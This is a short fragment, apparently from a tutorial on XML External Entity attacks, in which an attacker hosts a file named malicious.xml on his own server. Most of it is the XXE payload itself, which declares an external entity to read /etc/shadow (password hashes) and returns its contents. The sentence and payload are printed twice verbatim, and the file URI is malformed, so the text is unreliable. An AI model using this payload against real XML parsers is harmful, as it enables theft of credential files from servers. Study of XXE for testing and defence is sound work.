XML External Entities
He then hosts the malicious XML file on his own server as part of the trap.
malicious.xml<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xrds [
<!ENTITY passwords SYSTEM "file://etc/shadow">
]>
<xrds>
&passwords;
</xrds>He then hosts the malicious XML file on his own server as part of the trap.
malicious.xml<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xrds [
<!ENTITY passwords SYSTEM "file://etc/shadow">
]>
<xrds>
&passwords;
</xrds>